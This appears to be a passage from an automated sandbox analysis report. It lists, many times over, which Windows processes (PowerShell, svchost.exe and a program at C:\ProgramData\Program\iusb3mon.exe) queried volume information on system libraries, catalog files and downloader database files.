Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\Program\iusb3mon.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
